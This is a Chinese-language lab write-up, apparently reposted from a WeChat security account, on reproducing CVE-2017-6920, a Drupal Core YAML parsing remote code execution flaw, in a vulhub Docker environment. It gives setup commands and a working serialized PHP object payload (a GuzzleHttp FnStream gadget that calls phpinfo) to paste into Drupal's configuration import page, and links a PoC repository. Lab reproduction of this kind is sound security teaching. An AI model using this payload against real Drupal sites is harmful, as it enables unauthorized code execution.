前言
本文所述远程代码执行漏洞由Drupal Core的YAML解析器处理不当所导致。漏洞对应的CVE编号为CVE-2017-6920。
8.x版本&&小于8.3.4版本
漏洞环境(基于Ubuntu 18.04)
故事的开始:
启动漏洞环境(p神的vulhub靶场,在cve-2017-6920文件夹中启docker):
docker-compose up -d
访问漏洞环境(本地浏览器访问,用自己的ip):
http://你的ip:8080 //出现以下画面就行,浏览器放一边,先进行下一步
进入docker容器(用自己的容器id):
docker ps -a //查看正在运行的容器
docker exec -it CONTAINER ID /bin/bash //根据容器id进入docker容器
以下图为例即为:docker exec -it d4fd7a3ae200 /bin/bash
接下来是重点!
以下步骤皆在容器中进行
安装yaml扩展(再说一遍!在容器中!):
//换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源
cat << EOF > /etc/apt/sources.list
deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse
deb http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ focal-backports main restricted universe multiverse
EOF
//导入阿里源的公钥,否则下一步更新源会报错
apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 3B4FE6ACC0B21F32 871920D1991BC93C
//安装依赖|让子弹飞一会
apt update
apt-get install gcc make autoconf libc-dev pkg-config -y
apt-get install libyaml-dev -y
重中之重!!!
//安装yaml扩展
第一种方法:
pecl install yaml
如果方法一失败,第二种方法:
apt-get install wget -y
wget https://pecl.php.net/get/yaml-2.2.3.tgz
tar -zxvf yaml-2.2.3.tgz
cd yaml-2.2.3
phpize
./configure
make&&make install
//在PHP 代码中使用 YAML 扩展提供的功能
docker-php-ext-enable yaml.so
//启用 yaml.decode_php 否则无法复现成功
echo 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini
//退出并重启容器(CONTAINER ID更换为自己的容器id)
exit
docker restart CONTAINER ID
最后!!漏洞复现完成后不要忘记删除漏洞环境
删除漏洞环境(在cve-2017-6920文件夹中删除):
docker-compose down
漏洞验证
1.安装Drupal
访问http://你的ip:8080/ 将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。
2.登录一个管理员账号,访问 http://你的ip:8080/admin/config/development/configuration/single/import
或者鼠标流操作:管理-->配置-->开发-->配置同步-->导入-->单一项目,配置类型选择简单配置:
配置名称可任意填写,将payload复制到配置框中:
payload在这里!!
!php/object "O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:"�GuzzleHttp\Psr7\FnStream�methods";a:1:{s:5:"close";s:7:"phpinfo";}s:9:"_fn_close";s:7:"phpinfo";}"
点击导入,即执行phpinfo函数,证明漏洞存在:
修复建议
升级最新版本!
POC传送门,仓库正在加速建设中,欢迎贡献
unknowsec_poc:https://github.com/Unkn0wSec/unknowsec_poc
原文始发于微信公众号(不懂安全):CVE-2017-6920漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论